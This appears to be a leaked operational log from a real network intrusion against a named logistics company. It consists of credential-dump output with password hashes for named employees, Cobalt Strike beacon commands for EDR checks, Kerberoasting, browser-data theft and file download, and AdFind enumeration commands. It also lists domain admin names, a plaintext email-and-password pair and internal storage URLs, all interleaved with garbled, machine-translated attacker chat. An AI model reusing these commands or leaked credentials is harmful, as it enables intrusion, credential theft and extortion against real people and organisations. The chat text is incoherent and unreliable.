Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 3:12:11 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1184016058 (00000001:4692a6ba)
Session : RemoteInteractive from 22
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/5/2020 7:30:15 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 462032262 (00000001:1b8a0d86)
Session : RemoteInteractive from 19
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/28/2020 1:54:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4281980116 (00000000:ff39d4d4)
Session : RemoteInteractive from 18
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/23/2020 10:17:14 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4045964244 (00000000:f12883d4)
Session : RemoteInteractive from 17
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	 [00000003] Primary
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails2
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 4045959606 (00000000:f12871b6)
Session : Interactive from 17
User Name : DWM-17
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-90-17
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 0 ; 3751704448 (00000000:df9e7780)
Session : RemoteInteractive from 16
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/15/2020 1:35:54 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3729906510 (00000000:de51db4e)
Session : RemoteInteractive from 15
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/14/2020 4:06:50 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3288541437 (00000000:c40328fd)
Session : RemoteInteractive from 12
User Name : joel.reed
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/6/2020 10:44:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15177
	msv :
	 [00000003] Primary
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	 [00010000] CredentialKeys
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	tspkg :
	wdigest :
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : joel.reed
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 3288541401 (00000000:c40328d9)
Session : RemoteInteractive from 12
User Name : joel.reed
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/6/2020 10:44:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15177
	msv :
	 [00000003] Primary
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	 [00010000] CredentialKeys
	 * NTLM : 7d9d843800ed5d922b69507f2dd2cfda
	 * SHA1 : 05dd7dca30cf4eabf92fcfd2e951e608dea3af9e
	tspkg :
	wdigest :
	 * Username : joel.reed
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : joel.reed
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 2087392369 (00000000:7c6b1471)
Session : RemoteInteractive from 11
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/16/2020 4:44:41 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1983891583 (00000000:763fc87f)
Session : RemoteInteractive from 10
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/14/2020 1:20:20 PM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1638269471 (00000000:61a6021f)
Session : RemoteInteractive from 9
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/8/2020 11:31:51 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 504788415 (00000000:1e1675bf)
Session : RemoteInteractive from 7
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:56:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 472372604 (00000000:1c27d57c)
Session : RemoteInteractive from 6
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:32:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 472372568 (00000000:1c27d558)
Session : RemoteInteractive from 6
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:32:37 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116428364 (00000000:06f08e4c)
Session : RemoteInteractive from 4
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:56:27 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/12/2020 11:31:00 PM
SID : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	* kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman :
``Then it's time to sleep ``))`Did you manage to enter the main working domain with the EnterPrime? but I would have to look for the admin by the eta... yeah... as you can see the ing goes ``
beacon> edr_query localhost x64
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] ehdrv.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] ESET Found!
``````
beacon> powershell-import /home/trash/tools/Invoke-Kerberoast.ps1
[*] Tasked beacon to import: /home/trash/tools/Invoke-Kerberoast.ps1
[+] host called home, sent: 12760 bytes
beacon> psinject 10292 x64 Invoke-Kerberoast -OutputFormat HashCat | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl into 10292 (x64)
[+] host called home, sent: 133723 bytes
beacon> whoami
[-] Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
globalnet\sraadmin

strange guys strangely they separated the prod but left the mutual trust this trust domain clerks will and hashes Dana DK you tamu 2008 server why? no access first dsink I'll take it down...I want to see if my pid will give try to call something from your process
fuck what
psinject for example some weak script or something
it doesn't matter, you're not alone, do you still have a session in the extended domain? ahem
listen
there's a lot of things to check = (noisy and they'll stay as artifacts for analysis = (no
a lot of randl processes will stay there and then we'll have to shellcode them when we'll have to work a lot and so with migra problems we'll have to think how to locate...two domains we can do a simple what? you jump with an interpreter and fix it?
 3.5MB fil 12/02/2020 18:11:39 ad_computers.txt
 2.1MB fil 12/02/2020 18:11:47 ad_group.txt
 159.8KB fil 12/02/2020 18:11:39 ad_ous.txt
 159B fil 12/02/2020 18:11:44 ad_subnets.txt
 445B fil 12/02/2020 18:11:53 ad_trustdmp.txt
 12.8MB fil 12/02/2020 18:11:35 ad_users.txt
foundsraadmin can't this account jump into the main domain directly? okmmmmmtk if you use a system batnick then it will come off then try another host or something
i can't get it off the polzak (memory protected) i can't get it on the systemdas polzak processes? what context are you trying to use?

ldap_get_next_page_s: [ADC02-PHX01.globalnet.local] Error 0x1 (1) - Operations Error

Uh-huh, wrong one.
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=person)" > ad_users.txt
adfind.exe -b DC=globalnet,DC=local -f "objectcategory=computer" > ad_computers.txt
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -b DC=globalnet,DC=local -subnets -f (objectCategory=subnet)> ad_subnets.txt
adfind.exe -b DC=globalnet,DC=local -f "(objectcategory=group)" > ad_group.txt
adfind.exe -b DC=globalnet,DC=local -gcb -sc trustdmp > ad_trustdmp.txt
``What am I doing wrong? Here is their entire cloud system in this domain``
For the full year, GlobalTranz reported $1.4 billion in revenue, representing 62 percent year-over-year growth, a net revenue increase of 63 percent, and EBITDA growth of 150 percent.
``````
About GlobalTranz
GlobalTranz is a technology company providing award-winning cloud-based multi-modal Transportation Management System (TMS) products to shippers, carriers, 3PLs and brokers. GlobalTranz is leading the logistics software and services market in innovative technology that optimizes the efficiency of freight movement and matches shipper demand and carrier capacity in real-time. Leveraging its extensive independent agent network, GlobalTranz has emerged as a fast-growing market leader with a customer base of over 1 million product users and 25,000 shippers. In 2018, Transport Topics named GlobalTranz a Top 10 largest freight brokerage firm in the U.S.
Take off the second domain, it's their prodadomain, it's the server domain
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
acerimeli Administrator amadeus
aporwal bkadmin Caleb.Maher
ctrails ctrails2 emontgomery
eric gnet_admin godonnell
GTZ.Kace gtz__ssrsadmin james.clark
jared.lauzon jason.heller jeff.tarnowski
jgettman jhess jhoegl
jklida joel.reed john.mohlman
leland.andersen macie.oyler mjscott
prtgpoller sblumenthal sdavids
sjose skyler.tisue sraadmin
svcadmin

``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
A.Maser aarora AC.Prod
Administrator ahaines alan.blythe
amitv aporwal appscheduler
backendscheduler bdadyala bgarrick
bkadmin bkeene Caleb.Maher
Carl.Fields CC.Prod christopher.collazo
cr2.prod ctrails ctrails2
darwin.porter datamigration dave.devore
david.duvall DB_SRVC dbtest
eric.scheerer feliciano.torres g.boles
gnet_admin godonnell GTZ.Kace
gtz__ssrsadmin j.pillon james.clark
james.obryant jared.lauzon jason.heller
jeff.tarnowski jehad.Jamalalldeen jhess
jklida jobryant joel.reed
john.mohlman keith.hodges kevin.foster
leland.andersen lyle.larsen m.maurer
m.wozniak macie.oyler maintenance
Martin.Owings Matthew.Schmidt mbellman
mgserrano mlinder mwall
p.brahmbhatt P.Malling prodagent
prtgpoller R.Felker R.Pettit
RC.Prod rkladmin robert.koogle
rpeeta russ.felker ryan.pettit
ryan.terry S.Mohammed sjose
skyler.tisue SQLP_RelicAdmin sraadmin
subin svcadmin tabadmin
Umair.Anis vpntest12 y.khasho
``````
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
a.bousquet
a.ocr
Administrator
ahaines
ahaines1
amadeus
bgarrick
bkadmin
bkeene
bsezairi
caleb.maher
cara.crawford
chris.provan
christopher.collazo
ctrails
ctrails2
Daniel.collazo
darwin.porter
dave.devore
DBuchert
derek.schmidt
docimg
Domain Admins
donelson
EDI
EDI204Service
EDI204Service1
Enterprise Admins
eric.scheerer
feliciano.torres
g.boles
g.serrano
gnbdad
gnet_admin
godonnell
GTZ.Kace
gtz__ssrsadmin
j.pillon
jalbenberg
james.clark
james.obryant
jared.lauzon
jason.heller
jbooth
jeff.tarnowski
Jehad.Jamalalldeen
jgettman
jgettman1
jhess
jhohman
joel.reed
john.mohlman
joseph.urbine
keith.hodges
leland.andersen
lyle.larsen
m.maurer
m.wozniak
macie.oyler
malannefeld
mason.sanchez
mbiesiada
mbiesiada1
mdbenjamin
mgserrano
mjgaines
mjscott
mleyshon
mlinder
mmbiesiada
mwall
nbowser
p.brahmbhatt
p.vuong
prtgpoller
rkladmin
rkrugg
robert.koogle
rstubbs128
russ.felker
ryan.pettit
ryan.terry
sblumenthal
sdavids
shanna.thomas
skyler.tisue
Snigdha
sraadmin
svcadmin
tabadmin
tmgauthier
ttessmer
y.khasho

``````
      ADC02-PHX01.globalnet.local [DS] Site: PHX01
      ADC03-PHX01.globalnet.local [PDC] [DS] Site: PHX01
    GTZAZRGNADC01.globalnet.local [DS] Site: Azure-WestUS
    GTZZRGNADC02.globalnet.local [DS] Site: Azure-WestUS
``yeaheah
Now we'll see))) well, let's gookaye bye bye all goodnight read all right, tomorrow by 3 then i searched among the domains) lol) aaaaaaand the logo as the children's world on the rightzoho where did you see it? i do not see her noticing a match and here it is on the screen this grid was at work so, so? do not understanda here is such a coincidencea we were just poking ita what's wrong with it? #zohocorpin-com zohofiles delete)yes, sessions in the slip until tomorrow then and for today all will have time to get on rdto tomorrow to 301:12 PM`https://lastpass.com mharper@waterway.com LoveUnit14` and give shell timea logicalokayot system try it from his context? hehe`d you take away?

7-Zip (a) 18.05 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30

Scanning the drive:
2156 folders, 6028 files, 362713974 bytes (346 MiB)

Creating archive: ff.7z

Add new data to archive: 2156 folders, 6028 files, 362713974 bytes (346 MiB)


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cert9.db


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\content-prefs.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-wal


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\formhistory.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\key4.db


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\permissions.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-wal


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\protections.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-wal


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\weave\bookmarks.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-shm


WARNING: The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-wal


[+] received output:

Files read from disk: 6012
Archive size: 168244956 bytes (161 MiB)

WARNINGS for files:

krbjz40r.default-1588080079106\cert9.db : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\content-prefs.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\cookies.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\favicons.sqlite-wal : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\formhistory.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\key4.db : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\permissions.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\places.sqlite-wal : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\protections.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage-sync-v2.sqlite-wal : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\storage.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\weave\bookmarks.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-shm : The process cannot access the file because it is being used by another process.
krbjz40r.default-1588080079106\webappsstore.sqlite-wal : The process cannot access the file because it is being used by another process.
----------------
WARNING: Cannot open 22 files

The blue one is the same as the one you put in the coboo where the session from it hangs in theC:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\get me[ ](https://mediaeveryone.com/group/waterway-com?msg=rPWgFMijrSLESh3nM) and so on, we renamed it as native if anything, did you delete your files and put it in the original folder with your profile?i don't know how to check if it's ok, but i've already tried it, ff won't pick up the profile he put in the folder. if everything is ok, tomorrow let's close it quietly and check access to this URLGet the folder with his ff profile in the archive and dedicate it if not, by 4tomorrow by 6 and if everything is ok, i thought these guys switched to paper and hand the access by Planes)
30203 http://192.168.0.75/
30824 https://192.168.0.75/
30825 https://192.168.0.75/#/login
30826 https://192.168.0.75/#/dashboard
30827 https://192.168.0.75/#/manage/storage/group/volumes/summary
30828 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/summary
30829 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/connections
30830 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002d/data_access/access
30831 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/summary
30832 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000007/data_protection
30833 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/summary
30834 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_protection
30835 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/connections
30836 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/data_access/access
30837 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f2700000000000000000000002e/edit?startTabIndex=3
30890 https://192.168.0.75/#/manage/storage/volume/061da89855fe079f27000000000000000000000034/summary
``Bingo eat))``ww-nimble-01 ``https://192.168.0.75/#/login`` basic
nimbles:
    https://192.168.0.42
    https://192.168.0.43
    https://192.168.0.75
    https://192.168.0.77
What's the host and what's nimbla's host? and he has a fat history there + he's gone out of his messages?) I'm waiting for the last files and we won't leave until tomorrow. What about ff? so we haven't found nimbla access and close this network tomorrow by 6 let's finish with backups today. everywhere you touch backups, the whole network is full of backups. if not, we miss it. it's not certain that there is any, but you should look for ithtp://www://www.solarwinds.com/company/press-releases/2018-q1/solarwinds-introduces-cloud-first-backup-ѕervisetcurrent?[ ](https://mediaeveryone.com/group/waterway-com?msg=nXNNWJGfqQRE3tnBE) yeah no, it's monitoringc by the way there may be backups too it is solarwindsno @user7 seemed to find accesses? change without .back and see what is it delete it tamag, take back version ``
beacon> shell copy places.sqlite places.sqlite.back
[*] Tasked beacon to run: copy places.sqlite places.sqlite.back
[+] host called home, sent: 68 bytes
[+] received output:
        1 file(s) copied.

``in the keylog?``https://192.168.0.254 mharper@waterway.com LoveUnit14* ``:thinking:``places.sqlite places.sqlite.back``?
shell copy places.sqlite
``Try and try to make it with places, I'm losing my mind.``
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 01/05/2021 09:46:52 bookmarkbackups
          dir 11/16/2020 21:37:15 browser-extension-data
          dir 01/04/2021 14:56:52 crashes
          dir 01/05/2021 12:48:45:45 datareporting
          dir 12/17/2020 09:33:11 extensions
          dir 09/04/2020 13:15:30 gmp
          dir 04/28/2020 08:26:45 gmp-gmpopenh264
          dir 04/28/2020 08:26:46 gmp-widevinecdm
          dir 10/19/2020 16:22:05 minidumps
          dir 01/05/2021 03:08:07 saved-telemetry-pings
          dir 04/28/2020 08:26:46 security_state
          dir 01/05/2021 12:48:46 sessionstore-backups
          dir 12/31/2020 10:12:55 shader-cache
          dir 04/28/2020 08:21:23 storage
          dir 01/05/2021 12:43:45 weave
 28kb fil 01/05/2021 08:53:22 addons.json
 3kb fil 01/04/2021 14:58:43 addonStartup.json.lz4
 0b fil 01/04/2021 14:20:20 AlternateServices.txt
 3kb fil 01/05/2021 12:43:47 autofill-profiles.json
 216b fil 01/05/2021 12:06:12 broadcast-listeners.json
 352kb fil 12/21/2020 09:14:06 cert9.db
 11kb fil 12/21/2020 09:14:06 cert_override.txt
 0b fil 01/04/2021 14:20:20 ClientAuthRememberList.txt
 199b fil 12/23/2020 10:29:42 compatibility.ini
 1024b fil 08/17/2020 10:57:55 containers.json
 224kb fil 12/31/2020 11:18:27 content-prefs.sqlite
 1024kb fil 01/05/2021 12:48:43 cookies.sqlite
 32kb fil 01/04/2021 14:55:55 cookies.sqlite-shm
 0b fil 01/04/2021 14:55:55 cookies.sqlite-wal
 132b fil 08/03/2020 14:38:42 enumerate_devices.txt
 1kb fil 11/16/2020 21:37:17 extension-preferences.json
 470b fil 01/04/2021 14:55:57 extension-settings.json
 90kb fil 01/05/2021 08:55:23 extensions.json
 10mb fil 01/04/2021 14:17:59 favicons.sqlite
 32kb fil 01/04/2021 14:55:55 favicons.sqlite-shm
 320kb fil 01/04/2021 15:13:24 favicons.sqlite-wal
 864kb fil 01/05/2021 11:52:07 formhistory.sqlite
 1kb fil 12/31/2020 10:59:25 handlers.json
 16kb fil 08/15/2019 11:32:20 key3.db
 288kb fil 08/15/2019 11:32:20 key4.db
 3kb fil 01/05/2021 03:08:07 logins-backup.json
 3kb fil 01/05/2021 09:08:12 logins.json
 18kb fil 12/31/2020 12:15:22 notificationstore.json
 0b fil 01/04/2021 14:55:55 parent.lock
 96kb fil 01/04/2021 15:30:37 permissions.sqlite
 507b fil 04/28/2020 08:21:23 pkcs11.txt
 25mb fil 01/05/2021 11:52:08 places.sqlite
 32kb fil 01/04/2021 14:55:55 places.sqlite-shm
 3mb fil 01/05/2021 11:52:08 places.sqlite-wal
 1kb fil 12/24/2020 09:30:13 pluginreg.dat
 29kb fil 01/05/2021 12:43:45 prefs.js
 64kb fil 01/04/2021 14:57:35 protections.sqlite
 532b fil 01/04/2021 14:55:57 search.json.mozlz4
 0b fil 01/04/2021 14:20:20 SecurityPreloadState.txt
 11kb fil 01/04/2021 14:56:02 serviceworker.txt
 90b fil 01/04/2021 14:55:56 sessionCheckpoints.json
 2kb fil 01/05/2021 12:05:42
 3kb fil 01/05/2021 09:08:10 signedInUser.json
 53kb fil 01/05/2021 12:48:58 SiteSecurityServiceState.txt
 32kb fil 08/01/2020 09:29:18 storage-sync-v2.sqlite
 32kb fil 01/04/2021 14:57:39 storage-sync-v2.sqlite-shm
 1mb fil 12/16/2020 12:00:52 storage-sync-v2.sqlite-wal
 128kb fil 07/29/2020 19:52:03 storage-sync.sqlite
 22kb fil 01/04/2021 14:55:56 storage.sqlite
 47b fil 04/28/2020 08:21:19 times.json
 13mb fil 01/04/2021 15:09:04 webappsstore.sqlite
 32kb fil 01/04/2021 14:55:55 webappsstore.sqlite-shm
 704kb fil 01/04/2021 15:47:03 webappsstore.sqlite-wal
 1kb fil 01/05/2021 12:20:58 xulstore.json
``Give me the profile listing I can't find it and take the second one and make a copy History History.back```
====== FirefoxHistory ======

ERROR: IO exception, places.sqlite file likely in use (i.e. Firefox is likely running). The process cannot access the file 'C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite' because it is being used by another process.

    History (mharper):
``I'll compare if it's ok, we'll just take the history just in case and give me both files``.
places.sqlite
This file contains all your Firefox bookmarks and lists of all the files you've downloaded and websites you've visited.
``History''.
beacon> download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite
[*] Tasked beacon to download C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite
[+] host called home, sent: 110 bytes
[*] started download of C:\Users\mharper\AppData\Roaming\Mozilla\Firefox\Profiles\krbjz40r.default-1588080079106\places.sqlite (26214400 bytes)
[+] received output:
[-] Invoke_3 on EntryPoint failed.

I wonder where he went through his History file, I guess it's time to look for an alternative, I told you, he's the usual
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===
  [X] Exception: Key not valid for use in specified state.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.
If it works, give me the output I told you about it so sharpweb?)[ ](https://mediaeveryone.com/group/waterway-com?msg=gFhMrXxoJgABq7xWQ) than shoot it, check if the backups are up to date, give ffu only chrome, it must have worked in the fall have you? I have not worked at all)sharpweb as usual and you and chrome ffu have pulled?
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 2195:13:43 N/A
System 4 Services 0 4,980 K Unknown NT AUTHORITY\SYSTEM 32:36:26 N/A
Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
Registry 152 Services 0 78,556 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A
smss.exe 740 Services 0 1,032 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 1144 Services 0 3,304 K Unknown NT AUTHORITY\SYSTEM 0:01:06 N/A
